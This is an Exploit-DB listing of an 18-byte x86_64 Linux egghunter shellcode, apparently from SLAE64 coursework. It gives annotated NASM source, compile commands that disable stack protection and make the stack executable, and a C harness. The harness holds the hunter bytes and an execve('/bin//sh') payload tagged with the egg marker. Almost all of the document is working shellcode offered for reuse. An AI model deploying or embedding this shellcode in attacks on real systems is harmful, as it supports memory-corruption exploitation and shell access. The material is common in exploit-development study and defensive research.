Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)

EDB-ID:

39203

CVE:

N/A


Platform:

Linux_x86-64

Published:

2016-01-08

/*---------------------------------------------------------------------------------------------------------------------
/*
*Title:            x86_64 Linux egghunter in 18 bytes 
*Author:           Sathish kumar
*Contact:          https://www.linkedin.com/in/sathish94
*Description:      x86_64 linux egghunter which searches for the marker.
*Copyright:        (c) 2016 iQube. (http://iQube.io)
*Release Date:     January 7, 2016
*Tested On:        Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run:        gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*
*Nasm source:
* 
* 
global _start

_start:
 
egg:
  inc rdx               ; Address
  push rdx              ; pushing the value in the rdx to the stack
  pop rdi               ; sending rdx to rdi via stack
  push 0x50905090       ; pusing the egg marker into the stack
  pop rax
  inc eax               ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded
  scasd                 ; check if we have found the egg 
  jnz egg               ; try the next byte in the memory
  jmp rdi               ; go to the shellcode
                  
*Compile & Run:    nasm -f elf64 -o egghunter.o egghunter.nasm
                    ld -o egghunter egghunter.o
*/

#include <stdio.h>
#include <string.h>
 
char hunter[] = \
"\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7";

char execve_code_with_egg[] = \
//marker 
"\x91\x50\x90\x50"
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
 
int main(){
  printf("Egg Hunter Length:  %d\n", (int)strlen(hunter));
       (*(void  (*)()) hunter)();
       return 0;
}